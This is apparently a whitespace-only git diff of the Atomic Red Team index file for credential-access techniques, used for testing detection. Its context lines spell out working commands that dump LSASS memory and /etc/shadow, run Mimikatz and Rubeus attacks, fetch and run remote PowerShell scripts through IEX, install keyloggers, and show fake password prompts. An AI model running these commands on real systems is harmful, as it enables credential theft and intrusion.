Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1611/T1611.md"}]},{"techniqueID":"T1611","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1611/T1611.md"}]}]} \ No newline at end of file diff --git a/atomics/Indexes/index.yaml b/atomics/Indexes/index.yaml index 167324d3..b54288eb 100644 --- a/atomics/Indexes/index.yaml +++ b/atomics/Indexes/index.yaml @@ -61,7 +61,7 @@ credential-access: cat #{output_file} cleanup_command: 'rm -f #{output_file} - ' +' name: bash elevation_required: true - name: Access /etc/passwd (Local) @@ -80,13 +80,13 @@ credential-access: cat #{output_file} cleanup_command: 'rm -f #{output_file} - ' +' name: sh - name: Access /etc/{shadow,passwd} with a standard bin that's not cat auto_generated_guid: df1a55ae-019d-4120-bc35-94f4bc5c4b0a description: 'Dump /etc/passwd and /etc/shadow using ed - ' +' supported_platforms: - linux input_arguments: @@ -97,17 +97,17 @@ credential-access: executor: command: 'echo -e "e /etc/passwd\n,p\ne /etc/shadow\n,p\n" | ed > #{output_file} - ' +' cleanup_command: 'rm -f #{output_file} - ' +' name: bash elevation_required: true - name: Access /etc/{shadow,passwd} with shell builtins auto_generated_guid: f5aa6543-6cb2-4fae-b9c2-b96e14721713 description: 'Dump /etc/passwd and /etc/shadow using bash builtins - ' +' supported_platforms: - linux input_arguments: @@ -122,7 +122,7 @@ credential-access: testcat /etc/shadow > #{output_file} cleanup_command: 'rm -f #{output_file} - ' +' name: bash elevation_required: true T1557.002: @@ -313,32 +313,32 @@ credential-access: dependencies: - description: 'Computer must be domain joined - ' +' prereq_command: 'if((Get-CIMInstance -Class Win32_ComputerSystem).PartOfDomain) {exit 0} else {exit 1} - ' +' get_prereq_command: 'Write-Host Joining this computer to a domain must be done manually - ' +' - description: 'Rubeus must exist - ' +' prereq_command: 'if(Test-Path -Path #{local_folder}\#{local_executable}) {exit 0} else {exit 1} - ' +' get_prereq_command: 'Invoke-Webrequest -Uri #{rubeus_url} -OutFile #{local_folder}\#{local_executable} - ' +' executor: command: 'cmd.exe /c "#{local_folder}\#{local_executable}" asreproast /outfile:"#{local_folder}\#{out_file}" - ' +' cleanup_command: 'Remove-Item #{local_folder}\#{out_file} -ErrorAction Ignore - ' +' name: powershell elevation_required: false T1552.003: @@ -393,7 +393,7 @@ credential-access: description: 'Search through bash history for specifice commands we want to capture - ' +' supported_platforms: - linux - macos @@ -415,7 +415,7 @@ credential-access: command: 'cat #{bash_history_filename} | grep #{bash_history_grep_args} > #{output_file} - ' +' name: sh T1110: technique: @@ -650,7 +650,7 @@ credential-access: pod service account, for example) can access sensitive information that might include credentials to various services. - ' +' supported_platforms: - containers input_arguments: @@ -661,17 +661,17 @@ credential-access: dependencies: - description: 'kubectl must be installed - ' +' get_prereq_command: 'echo "kubectl must be installed manually" - ' +' prereq_command: 'which kubectl - ' +' executor: command: 'kubectl get secrets -n #{namespace} - ' +' name: bash elevation_required: false - name: Cat the contents of a Kubernetes service account token file @@ -679,7 +679,7 @@ credential-access: description: 'Access the Kubernetes service account access token stored within a container in a cluster. - ' +' supported_platforms: - linux dependency_executor_name: sh @@ -687,24 +687,24 @@ credential-access: - description: Verify docker is installed. prereq_command: 'which docker - ' +' get_prereq_command: 'if [ "" == "`which docker`" ]; then echo "Docker Not Found"; if [ -n "`which apt-get`" ]; then sudo apt-get -y install docker ; elif [ -n "`which yum`" ]; then sudo yum -y install docker ; fi ; else echo "Docker installed"; fi - ' +' - description: Verify docker service is running. prereq_command: 'sudo systemctl status docker - ' +' get_prereq_command: 'sudo systemctl start docker - ' +' - description: Verify kind is in the path. prereq_command: 'which kind - ' +' get_prereq_command: | curl -Lo ./kind https://kind.sigs.k8s.io/dl/v0.10.0/kind-linux-amd64 chmod +x ./kind @@ -712,14 +712,14 @@ credential-access: - description: Verify kind-atomic-cluster is created prereq_command: 'sudo kind get clusters - ' +' get_prereq_command: 'sudo kind create cluster --name atomic-cluster - ' +' - description: Verify kubectl is in path prereq_command: 'which kubectl - ' +' get_prereq_command: | curl -LO "https://dl.k8s.io/release/$(curl -L -s https://dl.k8s.io/release/stable.txt)/bin/linux/amd64/kubectl" chmod +x ./kubectl @@ -727,19 +727,19 @@ credential-access: - description: Verify atomic-pod is running. prereq_command: 'kubectl --context kind-atomic-cluster get pods |grep atomic-pod - ' +' get_prereq_command: 'kubectl --context kind-atomic-cluster run atomic-pod --image=alpine --command -- sleep infinity - ' +' executor: command: 'kubectl --context kind-atomic-cluster exec atomic-pod -- cat /run/secrets/kubernetes.io/serviceaccount/token - ' +' name: sh cleanup_command: 'kubectl --context kind-atomic-cluster delete pod atomic-pod - ' +' T1056.004: technique: external_references: @@ -841,7 +841,7 @@ credential-access: auto_generated_guid: de1934ea-1fbf-425b-8795-65fb27dd7e33 description: 'Hooks functions in PowerShell to read TLS Communications - ' +' supported_platforms: - windows input_arguments: @@ -857,10 +857,10 @@ credential-access: dependencies: - description: 'T1056.004x64.dll must exist on disk at specified location (#{file_name}) - ' +' prereq_command: 'if (Test-Path #{file_name}) {exit 0} else {exit 1} - ' +' get_prereq_command: | New-Item -Type Directory (split-path #{file_name}) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1056.004/bin/T1056.004x64.dll" -OutFile "#{file_name}" -UseBasicParsing @@ -946,7 +946,7 @@ credential-access: description: 'Using username,password combination from a password dump to login over SSH. - ' +' supported_platforms: - linux input_arguments: @@ -958,16 +958,16 @@ credential-access: dependencies: - description: 'Requires SSHPASS - ' +' prereq_command: 'if [ -x "$(command -v sshpass)" ]; then exit 0; else exit 1; fi; - ' +' get_prereq_command: 'if [ $(cat /etc/os-release | grep -i ID=ubuntu) ] || [ $(cat /etc/os-release | grep -i ID=kali) ]; then sudo apt update && sudo apt install sshpass -y; else echo "This test requires sshpass" ; fi ; - ' +' executor: name: bash elevation_required: false @@ -979,7 +979,7 @@ credential-access: description: 'Using username,password combination from a password dump to login over SSH. - ' +' supported_platforms: - macos input_arguments: @@ -991,11 +991,11 @@ credential-access: dependencies: - description: 'Requires SSHPASS - ' +' prereq_command: 'if [ -x "$(command -v sshpass)" ]; then exit 0; else exit 1; fi; - ' +' get_prereq_command: | /bin/bash -c "$(curl -fsSL https://raw.githubusercontent.com/Homebrew/install/master/install.sh)" brew install hudochenkov/sshpass/sshpass @@ -1091,14 +1091,14 @@ credential-access: executor: command: 'python2 laZagne.py all - ' +' elevation_required: true name: bash - name: Extract passwords with grep auto_generated_guid: bd4cf0d1-7646-474e-8610-78ccf5a097c4 description: 'Extracting credentials from files - ' +' supported_platforms: - macos - linux @@ -1110,14 +1110,14 @@ credential-access: executor: command: 'grep -ri password #{file_path} - ' +' name: sh - name: Extracting passwords with findstr auto_generated_guid: 0e56bf29-ff49-4ea5-9af4-3b81283fd513 description: 'Extracting Credentials from Files. Upon execution, the contents of files that contain the word "password" will be displayed. - ' +' supported_platforms: - windows executor: @@ -1143,7 +1143,7 @@ credential-access: description: 'This test looks for .netrc files (which stores github credentials in clear text )and dumps its contents if found. - ' +' supported_platforms: - macos - linux @@ -1207,7 +1207,7 @@ credential-access: dependencies: - description: 'Microsoft Word must be installed - ' +' prereq_command: | try { New-Object -COMObject "word.Application" | Out-Null @@ -1218,7 +1218,7 @@ credential-access: get_prereq_command: 'Write-Host "You will need to install Microsoft Word manually to meet this requirement" - ' +' executor: command: | [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 @@ -1227,7 +1227,7 @@ credential-access: cleanup_command: 'Remove-Item "$env:TEMP\windows-credentials.txt" -ErrorAction Ignore - ' +' name: powershell - name: Dump credentials from Windows Credential Manager With PowerShell [windows Credentials] @@ -1254,7 +1254,7 @@ credential-access: command: 'IEX (IWR ''https://raw.githubusercontent.com/skar4444/Windows-Credential-Manager/4ad208e70c80dd2a9961db40793da291b1981e01/GetCredmanCreds.ps1'' -UseBasicParsing); Get-CredManCreds -Force - ' +' - name: Enumerate credentials from Windows Credential Manager using vaultcmd.exe [Windows Credentials] auto_generated_guid: 36753ded-e5c4-4eb5-bc3c-e8fba236878d @@ -1267,7 +1267,7 @@ credential-access: elevation_required: false command: 'vaultcmd /listcreds:"Windows Credentials" /all - ' +' - name: Enumerate credentials from Windows Credential Manager using vaultcmd.exe [Web Credentials] auto_generated_guid: bc071188-459f-44d5-901a-f8f2625b2d2e @@ -1280,7 +1280,7 @@ credential-access: elevation_required: false command: 'vaultcmd /listcreds:"Web Credentials" /all - ' +' T1555.003: technique: created: '2020-02-12T18:57:36.041Z' @@ -1392,11 +1392,11 @@ credential-access: dependencies: - description: 'Modified Sysinternals must be located at #{file_path} - ' +' prereq_command: 'if (Test-Path #{file_path}\SysInternals) {exit 0} else {exit 1} - ' +' get_prereq_command: | [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 Invoke-WebRequest "https://github.com/mitre-attack/attack-arsenal/raw/66650cebd33b9a1e180f7b31261da1789cdceb66/adversary_emulation/APT29/CALDERA_DIY/evals/payloads/Modified-SysInternalsSuite.zip" -OutFile "#{file_path}\Modified-SysInternalsSuite.zip" @@ -1409,7 +1409,7 @@ credential-access: cleanup_command: 'Remove-Item #{file_path}\Sysinternals -Force -Recurse -ErrorAction Ignore - ' +' name: powershell - name: Search macOS Safari Cookies auto_generated_guid: c1402f7b-67ca-43a8-b5f3-3143abedc01b @@ -1446,10 +1446,10 @@ credential-access: dependencies: - description: 'LaZagne.exe must exist on disk at specified location (#{lazagne_path}) - ' +' prereq_command: 'if (Test-Path #{lazagne_path}) {exit 0} else {exit 1} - ' +' get_prereq_command: | New-Item -Type Directory (split-path #{lazagne_path}) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/AlessandroZ/LaZagne/releases/download/2.4.3/lazagne.exe" -OutFile "#{lazagne_path}" @@ -1467,7 +1467,7 @@ credential-access: dependencies: - description: 'Chrome must be installed - ' +' prereq_command: if ((Test-Path "C:\Program Files\Google\Chrome\Application\chrome.exe") -Or (Test-Path "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe")) {exit 0} else {exit 1} @@ -1495,7 +1495,7 @@ credential-access: dependencies: - description: 'Opera must be installed - ' +' prereq_command: if (((Test-Path "$env:LOCALAPPDATA\Programs\Opera\launcher.exe") -Or (Test-Path "C:\Program Files\Opera\launcher.exe") -Or (Test-Path "C:\Program Files (x86)\Opera\launcher.exe"))) {exit 0} else {exit 1} @@ -1507,23 +1507,23 @@ credential-access: Stop-Process -Name "opera" - description: 'Opera login data file must exist - ' +' prereq_command: if (Test-Path "$env:APPDATA\Opera Software\Opera Stable\Login Data") {exit 0} else {exit 1} get_prereq_command: 'New-Item -Path "$env:APPDATA\Opera Software\Opera Stable\Login Data" -ItemType File - ' +' executor: name: powershell command: 'Copy-Item "$env:APPDATA\Opera Software\Opera Stable\Login Data" -Destination $env:temp - ' +' cleanup_command: 'Remove-Item -Path "$env:temp\Login Data" -Force -ErrorAction Ignore - ' +' - name: Simulating access to Windows Firefox Login Data auto_generated_guid: eb8da98a-2e16-4551-b3dd-83de49baa14c description: | @@ -1535,7 +1535,7 @@ credential-access: dependencies: - description: 'Firefox must be installed - ' +' prereq_command: if ((Test-Path "C:\Program Files\Mozilla Firefox\firefox.exe") -Or (Test-Path "C:\Program Files (x86)\Mozilla Firefox\firefox.exe")) {exit 0} else {exit 1} @@ -1546,7 +1546,7 @@ credential-access: Start-Process $installer -ArgumentList '/S' -Wait - description: 'Firefox login data file must exist - ' +' prereq_command: if (Test-Path "$env:APPDATA\Mozilla\Firefox\Profiles\") {exit 0} else {exit 1} get_prereq_command: | @@ -1560,7 +1560,7 @@ credential-access: command: 'Copy-Item "$env:APPDATA\Mozilla\Firefox\Profiles\" -Destination $env:temp -Force - ' +' cleanup_command: Remove-Item -Path "$env:temp\Profiles" -Force -ErrorAction Ig T1552.002: @@ -1620,7 +1620,7 @@ credential-access: description: 'Queries to enumerate for credentials in the Registry. Upon execution, any registry key containing the word "password" will be displayed. - ' +' supported_platforms: - windows executor: @@ -1638,7 +1638,7 @@ credential-access: executor: command: 'reg query HKCU\Software\SimonTatham\PuTTY\Sessions /t REG_SZ /s - ' +' name: command_prompt T1003.006: technique: @@ -1755,7 +1755,7 @@ credential-access: - description: 'Mimikatz executor must exist on disk and at specified location (#{mimikatz_path}) - ' +' prereq_command: | $mimikatz_path = cmd /c echo #{mimikatz_path} if (Test-Path $mimikatz_path) {exit 0} else {exit 1} @@ -1772,7 +1772,7 @@ credential-access: command: '#{mimikatz_path} "lsadump::dcsync /domain:#{domain} /user:#{user}@#{domain}" "exit" - ' +' T1556.001: technique: external_references: @@ -1979,7 +1979,7 @@ credential-access: description: 'This module runs the Windows executable of PetitPotam in order to coerce authentication for a remote system. - ' +' supported_platforms: - windows input_arguments: @@ -2008,11 +2008,11 @@ credential-access: prereq_command: 'if (Test-Path "#{petitpotam_path}") { exit 0 } else { exit 1 } - ' +' get_prereq_command: 'Invoke-WebRequest "https://github.com/topotam/PetitPotam/blob/2ae559f938e67d0cd59c5afcaac67672b9ef2981/PetitPotam.exe?raw=true" -OutFile "#{petitpotam_path}" - ' +' executor: name: powershell elevation_required: false @@ -2161,7 +2161,7 @@ credential-access: to apply changes." & return & return default answer "" with icon 1 with hidden answer with title "Software Update"'' - ' +' name: bash - name: PowerShell - Prompt User for Password auto_generated_guid: 2b162bfd-0928-4d4c-9ec3-4d9f88374b52 @@ -2292,7 +2292,7 @@ credential-access: - description: 'Mimikatz executor must exist on disk and at specified location (#{mimikatz_path}) - ' +' prereq_command: | $mimikatz_path = cmd /c echo #{mimikatz_path} if (Test-Path $mimikatz_path) {exit 0} else {exit 1} @@ -2370,25 +2370,25 @@ credential-access: dependencies: - description: 'Computer must be domain joined - ' +' prereq_command: 'if((Get-CIMInstance -Class Win32_ComputerSystem).PartOfDomain) {exit 0} else {exit 1} - ' +' get_prereq_command: 'Write-Host Joining this computer to a domain must be done manually - ' +' - description: 'Rubeus must exist - ' +' prereq_command: 'if(Test-Path -Path #{local_folder}\#{local_executable}) {exit 0} else {exit 1} - ' +' get_prereq_command: 'Invoke-Webrequest -Uri #{rubeus_url} -OutFile #{local_folder}\#{local_executable} - ' +' executor: name: powershell elevation_required: false @@ -2482,26 +2482,26 @@ credential-access: files on the Domain Controller. This value can be decrypted with gpp-decrypt on Kali Linux. - ' +' supported_platforms: - windows dependency_executor_name: powershell dependencies: - description: 'Computer must be domain joined - ' +' prereq_command: 'if((Get-CIMInstance -Class Win32_ComputerSystem).PartOfDomain) {exit 0} else {exit 1} - ' +' get_prereq_command: 'Write-Host Joining this computer to a domain must be done manually - ' +' executor: command: 'findstr /S cpassword %logonserver%\sysvol\*.xml - ' +' name: command_prompt - name: GPP Passwords (Get-GPPPassword) auto_generated_guid: e9584f82-322c-474a-b831-940fd8b4455c @@ -2526,25 +2526,25 @@ credential-access: dependencies: - description: 'Get-GPPPassword PowerShell Script must exist at #{gpp_script_path} - ' +' prereq_command: 'if(Test-Path "#{gpp_script_path}") {exit 0 } else {exit 1 } - ' +' get_prereq_command: | New-Item -ItemType Directory (Split-Path "#{gpp_script_path}") -Force | Out-Null Invoke-WebRequest #{gpp_script_url} -OutFile "#{gpp_script_path}" - description: 'Computer must be domain joined - ' +' prereq_command: 'if((Get-CIMInstance -Class Win32_ComputerSystem).PartOfDomain) {exit 0} else {exit 1} - ' +' get_prereq_command: 'Write-Host Joining this computer to a domain must be done manually - ' +' executor: command: | . #{gpp_script_path} @@ -2717,15 +2717,15 @@ credential-access: dependencies: - description: 'Computer must be domain joined - ' +' prereq_command: 'if((Get-CIMInstance -Class Win32_ComputerSystem).PartOfDomain) {exit 0} else {exit 1} - ' +' get_prereq_command: 'Write-Host Joining this computer to a domain must be done manually - ' +' executor: command: | [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 @@ -2760,37 +2760,37 @@ credential-access: description: command flags you would like to run (optional and blank by default) type: String - default: + default: dependency_executor_name: powershell dependencies: - description: 'Computer must be domain joined - ' +' prereq_command: 'if((Get-CIMInstance -Class Win32_ComputerSystem).PartOfDomain) {exit 0} else {exit 1} - ' +' get_prereq_command: 'Write-Host Joining this computer to a domain must be done manually - ' +' - description: 'Rubeus must exist - ' +' prereq_command: 'if(Test-Path -Path #{local_folder}\#{local_executable}) {exit 0} else {exit 1} - ' +' get_prereq_command: 'Invoke-Webrequest -Uri #{rubeus_url} -OutFile #{local_folder}\#{local_executable} - ' +' executor: command: | klist purge cmd.exe /c "#{local_folder}\#{local_executable}" kerberoast #{flags} /outfile:"#{local_folder}\#{out_file}" cleanup_command: 'Remove-Item #{local_folder}\#{out_file} -ErrorAction Ignore - ' +' name: powershell elevation_required: false - name: Extract all accounts in use as SPN using setspn @@ -2810,19 +2810,19 @@ credential-access: dependencies: - description: 'Computer must be domain joined - ' +' prereq_command: 'if((Get-CIMInstance -Class Win32_ComputerSystem).PartOfDomain) {exit 0} else {exit 1} - ' +' get_prereq_command: 'Write-Host Joining this computer to a domain must be done manually - ' +' executor: command: 'setspn -T #{domain_name} -Q */* - ' +' name: command_prompt - name: Request A Single Ticket via PowerShell auto_generated_guid: 988539bc-2ed7-4e62-aec6-7c5cf6680863 @@ -2836,15 +2836,15 @@ credential-access: dependencies: - description: 'Computer must be domain joined - ' +' prereq_command: 'if((Get-CIMInstance -Class Win32_ComputerSystem).PartOfDomain) {exit 0} else {exit 1} - ' +' get_prereq_command: 'Write-Host Joining this computer to a domain must be done manually - ' +' executor: command: "Add-Type -AssemblyName System.IdentityModel\n$ComputerFQDN=$env:LogonServer.trimStart('\\') + \".\" + $env:UserDnsDomain\nNew-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken @@ -2867,15 +2867,15 @@ credential-access: dependencies: - description: 'Computer must be domain joined - ' +' prereq_command: 'if((Get-CIMInstance -Class Win32_ComputerSystem).PartOfDomain) {exit 0} else {exit 1} - ' +' get_prereq_command: 'Write-Host Joining this computer to a domain must be done manually - ' +' executor: command: "Add-Type -AssemblyName System.IdentityModel \nsetspn.exe -T #{domain_name} -Q */* | Select-String '^CN' -Context 0,1 | % { New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken @@ -3044,7 +3044,7 @@ credential-access: .\T1056.001\src\Get-Keystrokes.ps1 -LogPath #{filepath} cleanup_command: 'Remove-Item $env:TEMP\key.log -ErrorAction Ignore - ' +' name: powershell elevation_required: true - name: Living off the land Terminal Input Capture on Linux with pam.d @@ -3063,14 +3063,14 @@ credential-access: dependencies: - description: 'Checking if pam_tty_audit.so is installed - ' +' prereq_command: 'test -f ''/usr/lib/pam/pam_tty_audit.so -o /usr/lib64/security/pam_tty_audit.so'' - ' +' get_prereq_command: 'echo "Sorry, you must install module pam_tty_audit.so and recompile, for this test to work" - ' +' supported_platforms: - linux executor: @@ -3101,14 +3101,14 @@ credential-access: - description: 'This test requires to be run in a bash shell and that logger and tee are installed. - ' +' prereq_command: | if [ "$(echo $SHELL)" != "/bin/bash" ]; then echo -e "\n***** Bash not running! *****\n"; exit 1; fi if [ ! -x "$(command -v logger)" ]; then echo -e "\n***** logger NOT installed *****\n"; exit 1; fi if [ ! -x "$(command -v tee)" ]; then echo -e "\n***** tee NOT installed *****\n"; exit 1; fi get_prereq_command: 'echo "" - ' +' executor: name: sh elevation_required: true @@ -3118,7 +3118,7 @@ credential-access: tail /var/log/syslog cleanup_command: 'unset PROMPT_COMMAND - ' +' - name: Bash session based keylogger auto_generated_guid: 7f85a946-a0ea-48aa-b6ac-8ff539278258 description: "When a command is executed in bash, the BASH_COMMAND variable @@ -3135,14 +3135,14 @@ credential-access: dependencies: - description: 'This test requires to be run in a bash shell - ' +' prereq_command: 'if [ "$(echo $SHELL)" != "/bin/bash" ]; then echo -e "\n***** Bash not running! *****\n"; exit 1; fi - ' +' get_prereq_command: 'echo "" - ' +' input_arguments: output_file: name: output_file @@ -3158,7 +3158,7 @@ credential-access: cat #{output_file} cleanup_command: 'rm #{output_file} - ' +' - name: SSHD PAM keylogger auto_generated_guid: 81d7d2ad-d644-4b6a-bea7-28ffe43becca description: 'Linux PAM (Pluggable Authentication Modules) is used in sshd authentication. @@ -3166,20 +3166,20 @@ credential-access: of TTY input and capture all keystrokes in a ssh session and place them in the /var/log/audit/audit.log file after the session closes. - ' +' supported_platforms: - linux dependency_executor_name: sh dependencies: - description: 'This test requires sshd and auditd - ' +' prereq_command: | if [ ! -x "$(command -v sshd)" ]; then echo -e "\n***** sshd NOT installed *****\n"; exit 1; fi if [ ! -x "$(command -v auditd)" ]; then echo -e "\n***** auditd NOT installed *****\n"; exit 1; fi get_prereq_command: 'echo "" - ' +' input_arguments: user_account: description: Basic ssh user account for testing. @@ -3193,7 +3193,7 @@ credential-access: restart auditd\nssh #{user_account}@localhost \nwhoami\nsudo su\nwhoami\nexit\nexit\n" cleanup_command: 'cp -fv /tmp/sshd /etc/pam.d/ - ' +' - name: Auditd keylogger auto_generated_guid: a668edb9-334e-48eb-8c2e-5413a40867af description: "The linux audit tool auditd can be used to capture 32 and 64 bit @@ -3205,14 +3205,14 @@ credential-access: dependencies: - description: 'This test requires sshd and auditd - ' +' prereq_command: 'if [ ! -x "$(command -v auditd)" ]; then echo -e "\n***** auditd NOT installed *****\n"; exit 1; fi - ' +' get_prereq_command: 'echo "" - ' +' executor: name: sh elevation_required: true @@ -3221,7 +3221,7 @@ credential-access: $(date +\"%d/%m/%y %H:%M:%S\") \n" cleanup_command: 'systemctl restart auditd - ' +' T1557.001: technique: external_references: @@ -3541,10 +3541,10 @@ credential-access: - description: 'Windows Credential Editor must exist on disk at specified location (#{wce_exe}) - ' +' prereq_command: 'if (Test-Path #{wce_exe}) {exit 0} else {exit 1} - ' +' get_prereq_command: | $parentpath = Split-Path "#{wce_exe}"; $zippath = "$parentpath\wce.zip" [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 @@ -3584,10 +3584,10 @@ credential-access: - description: 'ProcDump tool from Sysinternals must exist on disk at specified location (#{procdump_exe}) - ' +' prereq_command: 'if (Test-Path #{procdump_exe}) {exit 0} else {exit 1} - ' +' get_prereq_command: | [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 Invoke-WebRequest "https://download.sysinternals.com/files/Procdump.zip" -OutFile "$env:TEMP\Procdump.zip" @@ -3598,7 +3598,7 @@ credential-access: command: "#{procdump_exe} -accepteula -ma lsass.exe #{output_file}\n" cleanup_command: 'del "#{output_file}" >nul 2> nul - ' +' name: command_prompt elevation_required: true - name: Dump LSASS.exe Memory using comsvcs.dll @@ -3613,10 +3613,10 @@ credential-access: command: 'C:\Windows\System32\rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump (Get-Process lsass).id $env:TEMP\lsass-comsvcs.dmp full - ' +' cleanup_command: 'Remove-Item $env:TEMP\lsass-comsvcs.dmp -ErrorAction Ignore - ' +' name: powershell elevation_required: true - name: Dump LSASS.exe Memory using direct system calls and API unhooking @@ -3639,10 +3639,10 @@ credential-access: - description: 'Dumpert executable must exist on disk at specified location (#{dumpert_exe}) - ' +' prereq_command: 'if (Test-Path #{dumpert_exe}) {exit 0} else {exit 1} - ' +' get_prereq_command: | [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 New-Item -ItemType Directory (Split-Path #{dumpert_exe}) -Force | Out-Null @@ -3651,7 +3651,7 @@ credential-access: command: "#{dumpert_exe}\n" cleanup_command: 'del C:\windows\temp\dumpert.dmp >nul 2> nul - ' +' name: command_prompt elevation_required: true - name: Dump LSASS.exe Memory using NanoDump @@ -3669,21 +3669,21 @@ credential-access: - description: 'NanoDump executable must exist on disk at specified location ($env:TEMP\nanodump.x64.exe) - ' +' prereq_command: 'if (Test-Path $env:TEMP\nanodump.x64.exe) {exit 0} else {exit 1} - ' +' get_prereq_command: | [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 Invoke-WebRequest "https://github.com/helpsystems/nanodump/raw/84db0c1737bbe027431733c193cfacf59a07259b/compiled/nanodump.x64.exe" -OutFile "$env:TEMP\nanodump.x64.exe" executor: command: '%temp%\nanodump.x64.exe -w "%temp%\nanodump.dmp" - ' +' cleanup_command: 'del "%temp%\nanodump.dmp" >nul 2> nul - ' +' name: command_prompt elevation_required: true - name: Dump LSASS.exe Memory using Windows Task Manager @@ -3726,10 +3726,10 @@ credential-access: dependencies: - description: 'Mimikatz must exist on disk at specified location (#{mimikatz_exe}) - ' +' prereq_command: 'if (Test-Path #{mimikatz_exe}) {exit 0} else {exit 1} - ' +' get_prereq_command: | [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 $mimikatz_relative_uri = Invoke-WebRequest "https://github.com/gentilkiwi/mimikatz/releases/latest" -UseBasicParsing | Select-Object -ExpandProperty Links | Where-Object -Property href -Like "*/mimikatz_trunk.zip" | Select-Object -ExpandProperty href @@ -3739,19 +3739,19 @@ credential-access: Copy-Item $env:TEMP\Mimi\x64\mimikatz.exe #{mimikatz_exe} -Force - description: 'Lsass dump must exist at specified location (#{input_file}) - ' +' prereq_command: 'cmd /c "if not exist #{input_file} (exit /b 1)" - ' +' get_prereq_command: 'Write-Host "Create the lsass dump manually using the steps in the previous test (Dump LSASS.exe Memory using Windows Task Manager)" - ' +' executor: command: '#{mimikatz_exe} "sekurlsa::minidump #{input_file}" "sekurlsa::logonpasswords full" exit - ' +' name: command_prompt elevation_required: true - name: LSASS read with pypykatz @@ -3768,35 +3768,35 @@ credential-access: dependencies: - description: 'Computer must have python 3 installed - ' +' prereq_command: | py -3 --version >nul 2>&1 exit /b %errorlevel% get_prereq_command: 'echo "Python 3 must be installed manually" - ' +' - description: 'Computer must have pip installed - ' +' prereq_command: | py -3 -m pip --version >nul 2>&1 exit /b %errorlevel% get_prereq_command: 'echo "PIP must be installed manually" - ' +' - description: 'pypykatz must be installed and part of PATH - ' +' prereq_command: | pypykatz -h >nul 2>&1 exit /b %errorlevel% get_prereq_command: 'pip install pypykatz - ' +' executor: command: 'pypykatz live lsa - ' +' name: command_prompt elevation_required: true - name: Dump LSASS.exe Memory using Out-Minidump.ps1 @@ -3813,7 +3813,7 @@ credential-access: IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Out-Minidump.ps1'); get-process lsass | Out-Minidump cleanup_command: 'Remove-Item $env:TEMP\lsass_*.dmp -ErrorAction Ignore - ' +' name: powershell elevation_required: true - name: Create Mini Dump of LSASS.exe using ProcDump @@ -3841,10 +3841,10 @@ credential-access: - description: 'ProcDump tool from Sysinternals must exist on disk at specified location (#{procdump_exe}) - ' +' prereq_command: 'if (Test-Path #{procdump_exe}) {exit 0} else {exit 1} - ' +' get_prereq_command: | Invoke-WebRequest "https://download.sysinternals.com/files/Procdump.zip" -OutFile "$env:TEMP\Procdump.zip" Expand-Archive $env:TEMP\Procdump.zip $env:TEMP\Procdump -Force @@ -3854,7 +3854,7 @@ credential-access: command: "#{procdump_exe} -accepteula -mm lsass.exe #{output_file}\n" cleanup_command: 'del "#{output_file}" >nul 2> nul - ' +' name: command_prompt elevation_required: true - name: Powershell Mimikatz @@ -3876,7 +3876,7 @@ credential-access: command: 'IEX (New-Object Net.WebClient).DownloadString(''#{remote_script}''); Invoke-Mimikatz -DumpCreds - ' +' name: powershell elevation_required: true - name: Dump LSASS with .Net 5 createdump.exe @@ -3898,15 +3898,15 @@ credential-access: dependencies: - description: 'Computer must have createdump.exe from .Net 5 - ' +' prereq_command: 'if (Test-Path ''#{createdump_exe}'') {exit 0} else {exit 1} - ' +' get_prereq_command: 'echo ".NET 5 must be installed manually." "For the very brave a copy of the executable can be found here: https://github.com/Scoubi/RedTeam-Tools/blob/main/createdump.exe" - ' +' executor: command: | echo "Createdump Path #{createdump_exe}" @@ -3916,7 +3916,7 @@ credential-access: & "#{createdump_exe}" -u -f #{output_file} $ID cleanup_command: 'Remove-Item #{output_file} -ErrorAction Ignore - ' +' name: powershell elevation_required: true - name: Dump LSASS.exe using imported Microsoft DLLs @@ -3941,10 +3941,10 @@ credential-access: dependencies: - description: 'Computer must have xordump.exe - ' +' prereq_command: 'if (Test-Path ''#{xordump_exe}'') {exit 0} else {exit 1} - ' +' get_prereq_command: | [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 Invoke-WebRequest "https://github.com/audibleblink/xordump/releases/download/v0.0.1/xordump.exe" -OutFile #{xordump_exe} @@ -3952,7 +3952,7 @@ credential-access: command: "#{xordump_exe} -out #{output_file} -x 0x41\n" cleanup_command: 'Remove-Item #{output_file} -ErrorAction Ignore - ' +' name: powershell elevation_required: true T1557: @@ -4158,19 +4158,19 @@ credential-access: dependencies: - description: 'Target must be a Domain Controller - ' +' prereq_command: 'reg query HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\ProductOptions /v ProductType | findstr LanmanNT - ' +' get_prereq_command: 'echo Sorry, Promoting this machine to a Domain Controller must be done manually - ' +' executor: command: 'vssadmin.exe create shadow /for=#{drive_letter} - ' +' name: command_prompt elevation_required: true - name: Copy NTDS.dit from Volume Shadow Copy @@ -4197,34 +4197,34 @@ credential-access: dependencies: - description: 'Target must be a Domain Controller - ' +' prereq_command: 'reg query HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\ProductOptions /v ProductType | findstr LanmanNT - ' +' get_prereq_command: 'echo Sorry, Promoting this machine to a Domain Controller must be done manually - ' +' - description: 'Volume shadow copy must exist - ' +' prereq_command: 'if not exist #{vsc_name} (exit /b 1) - ' 